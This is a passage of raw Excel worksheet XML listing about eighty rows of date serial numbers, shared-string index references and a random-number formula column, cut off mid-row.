    <row r="29811" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A29811" s="1">
        <v>42808.023379629631</v>
      </c>
      <c r="C29811" t="s">
        <v>319</v>
      </c>
      <c r="E29811" s="2" t="s">
        <v>27210</v>
      </c>
      <c r="F29811">
        <f t="shared" ca="1" si="465"/>
        <v>4</v>
      </c>
    </row>
    <row r="29812" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A29812" s="1">
        <v>42807.942766203705</v>
      </c>
      <c r="C29812" t="s">
        <v>10</v>
      </c>
      <c r="D29812" t="s">
        <v>36</v>
      </c>
      <c r="E29812" s="2" t="s">
        <v>27211</v>
      </c>
      <c r="F29812">
        <f t="shared" ca="1" si="465"/>
        <v>3</v>
      </c>
    </row>
    <row r="29813" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29813" s="1">
        <v>42807.887511574074</v>
      </c>
      <c r="C29813" t="s">
        <v>10</v>
      </c>
      <c r="D29813" t="s">
        <v>6</v>
      </c>
      <c r="E29813" t="s">
        <v>27212</v>
      </c>
      <c r="F29813">
        <f t="shared" ca="1" si="465"/>
        <v>5</v>
      </c>
    </row>
    <row r="29814" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A29814" s="1">
        <v>42807.847905092596</v>
      </c>
      <c r="C29814" t="s">
        <v>10</v>
      </c>
      <c r="D29814" t="s">
        <v>11</v>
      </c>
      <c r="E29814" s="2" t="s">
        <v>27213</v>
      </c>
      <c r="F29814">
        <f t="shared" ca="1" si="465"/>
        <v>1</v>
      </c>
    </row>
    <row r="29815" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29815" s="1">
        <v>42807.819189814814</v>
      </c>
      <c r="C29815" t="s">
        <v>10</v>
      </c>
      <c r="D29815" t="s">
        <v>6</v>
      </c>
      <c r="E29815" t="s">
        <v>27214</v>
      </c>
      <c r="F29815">
        <f t="shared" ca="1" si="465"/>
        <v>3</v>
      </c>
    </row>
    <row r="29816" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29816" s="1">
        <v>42807.813506944447</v>
      </c>
      <c r="C29816" t="s">
        <v>10</v>
      </c>
      <c r="D29816" t="s">
        <v>52</v>
      </c>
      <c r="E29816" t="s">
        <v>27215</v>
      </c>
      <c r="F29816">
        <f t="shared" ca="1" si="465"/>
        <v>2</v>
      </c>
    </row>
    <row r="29817" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29817" s="1">
        <v>42807.750902777778</v>
      </c>
      <c r="C29817" t="s">
        <v>10</v>
      </c>
      <c r="D29817" t="s">
        <v>229</v>
      </c>
      <c r="E29817" t="s">
        <v>27216</v>
      </c>
      <c r="F29817">
        <f t="shared" ca="1" si="465"/>
        <v>4</v>
      </c>
    </row>
    <row r="29818" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29818" s="1">
        <v>42807.691342592596</v>
      </c>
      <c r="C29818" t="s">
        <v>10</v>
      </c>
      <c r="D29818" t="s">
        <v>46</v>
      </c>
      <c r="E29818" t="s">
        <v>6496</v>
      </c>
      <c r="F29818">
        <f t="shared" ca="1" si="465"/>
        <v>1</v>
      </c>
    </row>
    <row r="29819" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A29819" s="1">
        <v>42807.632962962962</v>
      </c>
      <c r="C29819" t="s">
        <v>10</v>
      </c>
      <c r="D29819" t="s">
        <v>46</v>
      </c>
      <c r="E29819" s="2" t="s">
        <v>27217</v>
      </c>
      <c r="F29819">
        <f t="shared" ca="1" si="465"/>
        <v>3</v>
      </c>
    </row>
    <row r="29820" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A29820" s="1">
        <v>42807.612905092596</v>
      </c>
      <c r="C29820" t="s">
        <v>226</v>
      </c>
      <c r="E29820" s="2" t="s">
        <v>27218</v>
      </c>
      <c r="F29820">
        <f t="shared" ca="1" si="465"/>
        <v>2</v>
      </c>
    </row>
    <row r="29821" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A29821" s="1">
        <v>42807.603206018517</v>
      </c>
      <c r="C29821" t="s">
        <v>559</v>
      </c>
      <c r="E29821" s="2" t="s">
        <v>27219</v>
      </c>
      <c r="F29821">
        <f t="shared" ca="1" si="465"/>
        <v>3</v>
      </c>
    </row>
    <row r="29822" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A29822" s="1">
        <v>42807.601307870369</v>
      </c>
      <c r="C29822" t="s">
        <v>10</v>
      </c>
      <c r="D29822" t="s">
        <v>23</v>
      </c>
      <c r="E29822" s="2" t="s">
        <v>27220</v>
      </c>
      <c r="F29822">
        <f t="shared" ca="1" si="465"/>
        <v>3</v>
      </c>
    </row>
    <row r="29823" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29823" s="1">
        <v>42807.577175925922</v>
      </c>
      <c r="C29823" t="s">
        <v>97</v>
      </c>
      <c r="E29823" t="s">
        <v>27221</v>
      </c>
      <c r="F29823">
        <f t="shared" ca="1" si="465"/>
        <v>1</v>
      </c>
    </row>
    <row r="29824" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A29824" s="1">
        <v>42807.575474537036</v>
      </c>
      <c r="C29824" t="s">
        <v>6</v>
      </c>
      <c r="D29824" t="s">
        <v>25</v>
      </c>
      <c r="E29824" s="2" t="s">
        <v>27222</v>
      </c>
      <c r="F29824">
        <f t="shared" ca="1" si="465"/>
        <v>4</v>
      </c>
    </row>
    <row r="29825" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29825" s="1">
        <v>42807.574525462966</v>
      </c>
      <c r="C29825" t="s">
        <v>6</v>
      </c>
      <c r="D29825" t="s">
        <v>602</v>
      </c>
      <c r="E29825" t="s">
        <v>27223</v>
      </c>
      <c r="F29825">
        <f t="shared" ca="1" si="465"/>
        <v>2</v>
      </c>
    </row>
    <row r="29826" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29826" s="1">
        <v>42807.565925925926</v>
      </c>
      <c r="C29826" t="s">
        <v>5162</v>
      </c>
      <c r="E29826" t="s">
        <v>27224</v>
      </c>
      <c r="F29826">
        <f t="shared" ref="F29826:F29889" ca="1" si="466">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="29827" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A29827" s="1">
        <v>42807.560787037037</v>
      </c>
      <c r="C29827" t="s">
        <v>10</v>
      </c>
      <c r="D29827" t="s">
        <v>11</v>
      </c>
      <c r="E29827" s="2" t="s">
        <v>27225</v>
      </c>
      <c r="F29827">
        <f t="shared" ca="1" si="466"/>
        <v>3</v>
      </c>
    </row>
    <row r="29828" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29828" s="1">
        <v>42807.556817129633</v>
      </c>
      <c r="C29828" t="s">
        <v>6</v>
      </c>
      <c r="D29828" t="s">
        <v>25</v>
      </c>
      <c r="E29828" t="s">
        <v>27226</v>
      </c>
      <c r="F29828">
        <f t="shared" ca="1" si="466"/>
        <v>3</v>
      </c>
    </row>
    <row r="29829" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29829" s="1">
        <v>42807.550150462965</v>
      </c>
      <c r="C29829" t="s">
        <v>10</v>
      </c>
      <c r="D29829" t="s">
        <v>178</v>
      </c>
      <c r="E29829" t="s">
        <v>27227</v>
      </c>
      <c r="F29829">
        <f t="shared" ca="1" si="466"/>
        <v>2</v>
      </c>
    </row>
    <row r="29830" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A29830" s="1">
        <v>42807.542812500003</v>
      </c>
      <c r="C29830" t="s">
        <v>10</v>
      </c>
      <c r="D29830" t="s">
        <v>20</v>
      </c>
      <c r="E29830" s="2" t="s">
        <v>27228</v>
      </c>
      <c r="F29830">
        <f t="shared" ca="1" si="466"/>
        <v>2</v>
      </c>
    </row>
    <row r="29831" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A29831" s="1">
        <v>42807.519456018519</v>
      </c>
      <c r="C29831" t="s">
        <v>10</v>
      </c>
      <c r="D29831" t="s">
        <v>36</v>
      </c>
      <c r="E29831" s="2" t="s">
        <v>27229</v>
      </c>
      <c r="F29831">
        <f t="shared" ca="1" si="466"/>
        <v>2</v>
      </c>
    </row>
    <row r="29832" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A29832" s="1">
        <v>42807.515844907408</v>
      </c>
      <c r="C29832" t="s">
        <v>10</v>
      </c>
      <c r="D29832" t="s">
        <v>46</v>
      </c>
      <c r="E29832" s="2" t="s">
        <v>27230</v>
      </c>
      <c r="F29832">
        <f t="shared" ca="1" si="466"/>
        <v>4</v>
      </c>
    </row>
    <row r="29833" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29833" s="1">
        <v>42807.5153125</v>
      </c>
      <c r="C29833" t="s">
        <v>41</v>
      </c>
      <c r="E29833" t="s">
        <v>27231</v>
      </c>
      <c r="F29833">
        <f t="shared" ca="1" si="466"/>
        <v>3</v>
      </c>
    </row>
    <row r="29834" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29834" s="1">
        <v>42807.479108796295</v>
      </c>
      <c r="C29834" t="s">
        <v>10</v>
      </c>
      <c r="D29834" t="s">
        <v>89</v>
      </c>
      <c r="E29834" t="s">
        <v>27232</v>
      </c>
      <c r="F29834">
        <f t="shared" ca="1" si="466"/>
        <v>3</v>
      </c>
    </row>
    <row r="29835" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A29835" s="1">
        <v>42807.421076388891</v>
      </c>
      <c r="C29835" t="s">
        <v>71</v>
      </c>
      <c r="E29835" s="2" t="s">
        <v>27233</v>
      </c>
      <c r="F29835">
        <f t="shared" ca="1" si="466"/>
        <v>2</v>
      </c>
    </row>
    <row r="29836" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29836" s="1">
        <v>42807.411469907405</v>
      </c>
      <c r="C29836" t="s">
        <v>71</v>
      </c>
      <c r="E29836" t="s">
        <v>27234</v>
      </c>
      <c r="F29836">
        <f t="shared" ca="1" si="466"/>
        <v>2</v>
      </c>
    </row>
    <row r="29837" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A29837" s="1">
        <v>42807.396504629629</v>
      </c>
      <c r="C29837" t="s">
        <v>10</v>
      </c>
      <c r="D29837" t="s">
        <v>163</v>
      </c>
      <c r="E29837" s="2" t="s">
        <v>27235</v>
      </c>
      <c r="F29837">
        <f t="shared" ca="1" si="466"/>
        <v>1</v>
      </c>
    </row>
    <row r="29838" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29838" s="1">
        <v>42807.387557870374</v>
      </c>
      <c r="C29838" t="s">
        <v>124</v>
      </c>
      <c r="E29838" t="s">
        <v>27236</v>
      </c>
      <c r="F29838">
        <f t="shared" ca="1" si="466"/>
        <v>2</v>
      </c>
    </row>
    <row r="29839" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A29839" s="1">
        <v>42807.382245370369</v>
      </c>
      <c r="C29839" t="s">
        <v>65</v>
      </c>
      <c r="E29839" s="2" t="s">
        <v>27237</v>
      </c>
      <c r="F29839">
        <f t="shared" ca="1" si="466"/>
        <v>3</v>
      </c>
    </row>
    <row r="29840" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A29840" s="1">
        <v>42807.372164351851</v>
      </c>
      <c r="C29840" t="s">
        <v>67</v>
      </c>
      <c r="E29840" s="2" t="s">
        <v>27238</v>
      </c>
      <c r="F29840">
        <f t="shared" ca="1" si="466"/>
        <v>5</v>
      </c>
    </row>
    <row r="29841" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29841" s="1">
        <v>42807.35497685185</v>
      </c>
      <c r="C29841" t="s">
        <v>41</v>
      </c>
      <c r="E29841" t="s">
        <v>27239</v>
      </c>
      <c r="F29841">
        <f t="shared" ca="1" si="466"/>
        <v>1</v>
      </c>
    </row>
    <row r="29842" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A29842" s="1">
        <v>42807.344525462962</v>
      </c>
      <c r="C29842" t="s">
        <v>103</v>
      </c>
      <c r="E29842" s="2" t="s">
        <v>27240</v>
      </c>
      <c r="F29842">
        <f t="shared" ca="1" si="466"/>
        <v>5</v>
      </c>
    </row>
    <row r="29843" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A29843" s="1">
        <v>42807.343715277777</v>
      </c>
      <c r="C29843" t="s">
        <v>103</v>
      </c>
      <c r="E29843" s="2" t="s">
        <v>27241</v>
      </c>
      <c r="F29843">
        <f t="shared" ca="1" si="466"/>
        <v>2</v>
      </c>
    </row>
    <row r="29844" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A29844" s="1">
        <v>42807.343645833331</v>
      </c>
      <c r="C29844" t="s">
        <v>103</v>
      </c>
      <c r="E29844" s="2" t="s">
        <v>27241</v>
      </c>
      <c r="F29844">
        <f t="shared" ca="1" si="466"/>
        <v>1</v>
      </c>
    </row>
    <row r="29845" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A29845" s="1">
        <v>42807.343622685185</v>
      </c>
      <c r="C29845" t="s">
        <v>103</v>
      </c>
      <c r="E29845" s="2" t="s">
        <v>27241</v>
      </c>
      <c r="F29845">
        <f t="shared" ca="1" si="466"/>
        <v>1</v>
      </c>
    </row>
    <row r="29846" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29846" s="1">
        <v>42807.339201388888</v>
      </c>
      <c r="C29846" t="s">
        <v>16</v>
      </c>
      <c r="E29846" t="s">
        <v>27242</v>
      </c>
      <c r="F29846">
        <f t="shared" ca="1" si="466"/>
        <v>5</v>
      </c>
    </row>
    <row r="29847" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29847" s="1">
        <v>42807.321574074071</v>
      </c>
      <c r="C29847" t="s">
        <v>10</v>
      </c>
      <c r="D29847" t="s">
        <v>107</v>
      </c>
      <c r="E29847" t="s">
        <v>27243</v>
      </c>
      <c r="F29847">
        <f t="shared" ca="1" si="466"/>
        <v>3</v>
      </c>
    </row>
    <row r="29848" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A29848" s="1">
        <v>42807.291620370372</v>
      </c>
      <c r="C29848" t="s">
        <v>271</v>
      </c>
      <c r="E29848" s="2" t="s">
        <v>27244</v>
      </c>
      <c r="F29848">
        <f t="shared" ca="1" si="466"/>
        <v>3</v>
      </c>
    </row>
    <row r="29849" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29849" s="1">
        <v>42807.262129629627</v>
      </c>
      <c r="C29849" t="s">
        <v>41</v>
      </c>
      <c r="E29849" t="s">
        <v>27245</v>
      </c>
      <c r="F29849">
        <f t="shared" ca="1" si="466"/>
        <v>3</v>
      </c>
    </row>
    <row r="29850" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29850" s="1">
        <v>42807.227465277778</v>
      </c>
      <c r="C29850" t="s">
        <v>41</v>
      </c>
      <c r="E29850" t="s">
        <v>27246</v>
      </c>
      <c r="F29850">
        <f t="shared" ca="1" si="466"/>
        <v>5</v>
      </c>
    </row>
    <row r="29851" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29851" s="1">
        <v>42807.224444444444</v>
      </c>
      <c r="C29851" t="s">
        <v>48</v>
      </c>
      <c r="D29851" t="s">
        <v>312</v>
      </c>
      <c r="E29851" t="s">
        <v>27247</v>
      </c>
      <c r="F29851">
        <f t="shared" ca="1" si="466"/>
        <v>2</v>
      </c>
    </row>
    <row r="29852" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29852" s="1">
        <v>42807.157094907408</v>
      </c>
      <c r="C29852" t="s">
        <v>71</v>
      </c>
      <c r="E29852" t="s">
        <v>27248</v>
      </c>
      <c r="F29852">
        <f t="shared" ca="1" si="466"/>
        <v>1</v>
      </c>
    </row>
    <row r="29853" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29853" s="1">
        <v>42807.103715277779</v>
      </c>
      <c r="C29853" t="s">
        <v>10</v>
      </c>
      <c r="D29853" t="s">
        <v>312</v>
      </c>
      <c r="E29853" t="s">
        <v>27249</v>
      </c>
      <c r="F29853">
        <f t="shared" ca="1" si="466"/>
        <v>1</v>
      </c>
    </row>
    <row r="29854" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A29854" s="1">
        <v>42807.05364583333</v>
      </c>
      <c r="C29854" t="s">
        <v>10</v>
      </c>
      <c r="D29854" t="s">
        <v>36</v>
      </c>
      <c r="E29854" s="2" t="s">
        <v>27250</v>
      </c>
      <c r="F29854">
        <f t="shared" ca="1" si="466"/>
        <v>1</v>
      </c>
    </row>
    <row r="29855" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29855" s="1">
        <v>42807.041087962964</v>
      </c>
      <c r="C29855" t="s">
        <v>41</v>
      </c>
      <c r="E29855" t="s">
        <v>27251</v>
      </c>
      <c r="F29855">
        <f t="shared" ca="1" si="466"/>
        <v>5</v>
      </c>
    </row>
    <row r="29856" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A29856" s="1">
        <v>42806.985844907409</v>
      </c>
      <c r="C29856" t="s">
        <v>140</v>
      </c>
      <c r="E29856" s="2" t="s">
        <v>27252</v>
      </c>
      <c r="F29856">
        <f t="shared" ca="1" si="466"/>
        <v>5</v>
      </c>
    </row>
    <row r="29857" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29857" s="1">
        <v>42806.898981481485</v>
      </c>
      <c r="C29857" t="s">
        <v>749</v>
      </c>
      <c r="E29857" t="s">
        <v>27253</v>
      </c>
      <c r="F29857">
        <f t="shared" ca="1" si="466"/>
        <v>5</v>
      </c>
    </row>
    <row r="29858" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29858" s="1">
        <v>42806.707175925927</v>
      </c>
      <c r="C29858" t="s">
        <v>10</v>
      </c>
      <c r="D29858" t="s">
        <v>36</v>
      </c>
      <c r="E29858" t="s">
        <v>27254</v>
      </c>
      <c r="F29858">
        <f t="shared" ca="1" si="466"/>
        <v>2</v>
      </c>
    </row>
    <row r="29859" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A29859" s="1">
        <v>42806.138333333336</v>
      </c>
      <c r="C29859" t="s">
        <v>60</v>
      </c>
      <c r="E29859" s="2" t="s">
        <v>27255</v>
      </c>
      <c r="F29859">
        <f t="shared" ca="1" si="466"/>
        <v>4</v>
      </c>
    </row>
    <row r="29860" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29860" s="1">
        <v>42806.023576388892</v>
      </c>
      <c r="C29860" t="s">
        <v>41</v>
      </c>
      <c r="E29860" t="s">
        <v>27256</v>
      </c>
      <c r="F29860">
        <f t="shared" ca="1" si="466"/>
        <v>4</v>
      </c>
    </row>
    <row r="29861" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29861" s="1">
        <v>42805.934224537035</v>
      </c>
      <c r="C29861" t="s">
        <v>41</v>
      </c>
      <c r="E29861" t="s">
        <v>27257</v>
      </c>
      <c r="F29861">
        <f t="shared" ca="1" si="466"/>
        <v>5</v>
      </c>
    </row>
    <row r="29862" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29862" s="1">
        <v>42805.654236111113</v>
      </c>
      <c r="C29862" t="s">
        <v>10</v>
      </c>
      <c r="D29862" t="s">
        <v>20</v>
      </c>
      <c r="E29862" t="s">
        <v>27258</v>
      </c>
      <c r="F29862">
        <f t="shared" ca="1" si="466"/>
        <v>2</v>
      </c>
    </row>
    <row r="29863" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29863" s="1">
        <v>42805.521215277775</v>
      </c>
      <c r="C29863" t="s">
        <v>10</v>
      </c>
      <c r="D29863" t="s">
        <v>52</v>
      </c>
      <c r="F29863">
        <f t="shared" ca="1" si="466"/>
        <v>3</v>
      </c>
    </row>
    <row r="29864" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29864" s="1">
        <v>42805.520428240743</v>
      </c>
      <c r="C29864" t="s">
        <v>10</v>
      </c>
      <c r="D29864" t="s">
        <v>52</v>
      </c>
      <c r="E29864" t="s">
        <v>27259</v>
      </c>
      <c r="F29864">
        <f t="shared" ca="1" si="466"/>
        <v>2</v>
      </c>
    </row>
    <row r="29865" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A29865" s="1">
        <v>42805.501689814817</v>
      </c>
      <c r="C29865" t="s">
        <v>6</v>
      </c>
      <c r="D29865" t="s">
        <v>194</v>
      </c>
      <c r="E29865" s="2" t="s">
        <v>27260</v>
      </c>
      <c r="F29865">
        <f t="shared" ca="1" si="466"/>
        <v>2</v>
      </c>
    </row>
    <row r="29866" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29866" s="1">
        <v>42805.250532407408</v>
      </c>
      <c r="C29866" t="s">
        <v>41</v>
      </c>
      <c r="E29866" t="s">
        <v>27261</v>
      </c>
      <c r="F29866">
        <f t="shared" ca="1" si="466"/>
        <v>4</v>
      </c>
    </row>
    <row r="29867" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A29867" s="1">
        <v>42805.239386574074</v>
      </c>
      <c r="C29867" t="s">
        <v>1931</v>
      </c>
      <c r="E29867" s="2" t="s">
        <v>27262</v>
      </c>
      <c r="F29867">
        <f t="shared" ca="1" si="466"/>
        <v>2</v>
      </c>
    </row>
    <row r="29868" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29868" s="1">
        <v>42804.87054398148</v>
      </c>
      <c r="C29868" t="s">
        <v>10</v>
      </c>
      <c r="D29868" t="s">
        <v>229</v>
      </c>
      <c r="E29868" t="s">
        <v>27263</v>
      </c>
      <c r="F29868">
        <f t="shared" ca="1" si="466"/>
        <v>4</v>
      </c>
    </row>
    <row r="29869" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29869" s="1">
        <v>42804.792060185187</v>
      </c>
      <c r="C29869" t="s">
        <v>290</v>
      </c>
      <c r="E29869" t="s">
        <v>27264</v>
      </c>
      <c r="F29869">
        <f t="shared" ca="1" si="466"/>
        <v>3</v>
      </c>
    </row>
    <row r="29870" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29870" s="1">
        <v>42804.712858796294</v>
      </c>
      <c r="C29870" t="s">
        <v>10</v>
      </c>
      <c r="D29870" t="s">
        <v>14</v>
      </c>
      <c r="E29870" t="s">
        <v>27265</v>
      </c>
      <c r="F29870">
        <f t="shared" ca="1" si="466"/>
        <v>4</v>
      </c>
    </row>
    <row r="29871" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29871" s="1">
        <v>42804.704525462963</v>
      </c>
      <c r="C29871" t="s">
        <v>10</v>
      </c>
      <c r="D29871" t="s">
        <v>192</v>
      </c>
      <c r="E29871" t="s">
        <v>27266</v>
      </c>
      <c r="F29871">
        <f t="shared" ca="1" si="466"/>
        <v>3</v>
      </c>
    </row>
    <row r="29872" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29872" s="1">
        <v>42804.670347222222</v>
      </c>
      <c r="C29872" t="s">
        <v>6</v>
      </c>
      <c r="D29872" t="s">
        <v>25</v>
      </c>
      <c r="E29872" t="s">
        <v>27267</v>
      </c>
      <c r="F29872">
        <f t="shared" ca="1" si="466"/>
        <v>5</v>
      </c>
    </row>
    <row r="29873" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29873" s="1">
        <v>42804.629108796296</v>
      </c>
      <c r="C29873" t="s">
        <v>6</v>
      </c>
      <c r="D29873" t="s">
        <v>25</v>
      </c>
      <c r="E29873" t="s">
        <v>828</v>
      </c>
      <c r="F29873">
        <f t="shared" ca="1" si="466"/>
        <v>4</v>
      </c>
    </row>
    <row r="29874" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29874" s="1">
        <v>42804.607905092591</v>
      </c>
      <c r="C29874" t="s">
        <v>10</v>
      </c>
      <c r="D29874" t="s">
        <v>17</v>
      </c>
      <c r="E29874" t="s">
        <v>27268</v>
      </c>
      <c r="F29874">
        <f t="shared" ca="1" si="466"/>
        <v>3</v>
      </c>
    </row>
    <row r="29875" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29875" s="1">
        <v>42804.570902777778</v>
      </c>
      <c r="C29875" t="s">
        <v>231</v>
      </c>
      <c r="E29875" t="s">
        <v>27269</v>
      </c>
      <c r="F29875">
        <f t="shared" ca="1" si="466"/>
        <v>5</v>
      </c>
    </row>
    <row r="29876" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29876" s="1">
        <v>42804.56517361111</v>
      </c>
      <c r="C29876" t="s">
        <v>6</v>
      </c>
      <c r="D29876" t="s">
        <v>25</v>
      </c>
      <c r="E29876" t="s">
        <v>828</v>
      </c>
      <c r="F29876">
        <f t="shared" ca="1" si="466"/>
        <v>4</v>
      </c>
    </row>
    <row r="29877" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A29877" s="1">
        <v>42804.557743055557</v>
      </c>
      <c r="C29877" t="s">
        <v>6</v>
      </c>
      <c r="D29877" t="s">
        <v>25</v>
      </c>
      <c r="E29877" s="2" t="s">
        <v>27270</v>
      </c>
      <c r="F29877">
        <f t="shared" ca="1" si="466"/>
        <v>3</v>
      </c>
    </row>
    <row r="29878" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29878" s="1">
        <v>42804.538194444445</v>
      </c>
      <c r="C29878" t="s">
        <v>10</v>
      </c>
      <c r="D29878" t="s">
        <v>6</v>
      </c>
      <c r="E29878" t="s">
        <v>27271</v>
      </c>
      <c r="F29878">
        <f t="shared" ca="1" si="466"/>
        <v>3</v>
      </c>
    </row>
    <row r="29879" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29879" s="1">
        <v>42804.534074074072</v>
      </c>
      <c r="C29879" t="s">
        <v>2104</v>
      </c>
      <c r="E29879" t="s">
        <v>27272</v>
      </c>
      <c r="F29879">
        <f t="shared" ca="1" si="466"/>
        <v>4</v>
      </c>
    </row>
    <row r="29880" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29880" s="1">
        <v>42804.503125000003</v>
      </c>
      <c r="C29880" t="s">
        <v>173</v>
      </c>
      <c r="E29880" t="s">
        <v>27273</v>
      </c>
      <c r="F29880">
        <f t="shared" ca="1" si="466"/>
        <v>3</v>
      </c>
    </row>
    <row r="29881" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29881" s="1">
        <v>42804.485798611109</v>
      </c>
      <c r="C29881" t="s">
        <v>14</v>
      </c>
      <c r="E29881" t="s">
        <v>27274</v>
      </c>
      <c r="F29881">
        <f t="shared" ca="1" si="466"/>
        <v>3</v>
      </c>
    </row>
    <row r="29882" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29882" s="1">
        <v>42804.477893518517</v>
      </c>
      <c r="C29882" t="s">
        <v>10</v>
      </c>
      <c r="D29882" t="s">
        <v>290</v>
      </c>
      <c r="F29882">
        <f t="shared" ca="1" si="466"/>
        <v>3</v>
      </c>
    </row>
    <row r="29883" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A29883" s="1">
        <v>42804.477407407408</v>
      </c>
      <c r="C29883" t="s">
        <v>10</v>
      </c>
      <c r="D29883" t="s">
        <v>17</v>
      </c>
      <c r="E29883" s="2" t="s">
        <v>27275</v>
      </c>
      <c r="F29883">
        <f t="shared" ca="1" si="466"/>
        <v>1</v>
      </c>
    </row>
    <row r="29884" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A29884" s="1">
        <v>42804.417118055557</v>
      </c>
      <c r="C29884" t="s">
        <v>29</v>
      </c>
      <c r="E29884" s="2" t="s">
        <v>27276</v>
      </c>
      <c r="F29884">
        <f t="shared" ca="1" si="466"/>
        <v>2</v>
      </c>
    </row>
    <row r="29885" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A29885" s="1">
        <v>42804.407199074078</v>
      </c>
      <c r="C29885" t="s">
        <v>50</v>
      </c>
      <c r="E29885" s="2" t="s">
        <v>27277</v>
      </c>
      <c r="F29885">
        <f t="shared" ca="1" si="466"/>
        <v>1</v>
      </c>
    </row>
    <row r="29886" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29886" s="1">
        <v>42804.385266203702</v>
      </c>
      <c r="C29886" t="s">
        <v>65</v>
      </c>
      <c r="E29886" t="s">
        <v>27278</v>
      </c>
      <c r="F29886">
        <f t="shared" ca="1" si="466"/>
        <v>1</v>
      </c>
    </row>
    <row r="29887" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A29887" s="1">
        <v>42804.375763888886</v>
      </c>
      <c r="C29887" t="s">
        <v>71</v>
      </c>
      <c r="E29887" s="2" t="s">
        <v>27279</v>
      </c>
      <c r="F29887">
        <f t="shared" ca="1" si="466"/>
        <v>4</v>
      </c>
    </row>
    <row r="29888" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A29888" s="1">
        <v>42804.356620370374</v>
      </c>
      <c r="C29888" t="s">
        <v>10</v>
      </c>
      <c r="D29888" t="s">
        <v>80</v>
      </c>
      <c r="E29888" s="2" t="s">
        <v>27280</v>
      </c>
      <c r="F29888">
        <f t="shared" ca="1" si="466"/>
        <v>2</v>
      </c>
    </row>
    <row r="29889" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29889" s="1">
        <v>42804.339548611111</v>
      </c>
      <c r="C29889" t="s">
        <v>10</v>
      </c>
      <c r="D29889" t="s">
        <v>89</v>
      </c>
      <c r="E29889" t="s">
        <v>27281</v>
      </c>
      <c r="F29889">
        <f t="shared" ca="1" si="466"/>
        <v>1</v>
      </c>
    </row>
    <row r="29890" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29890" s="1">
        <v>42804.32371527778</v>
      </c>
      <c r="C29890" t="s">
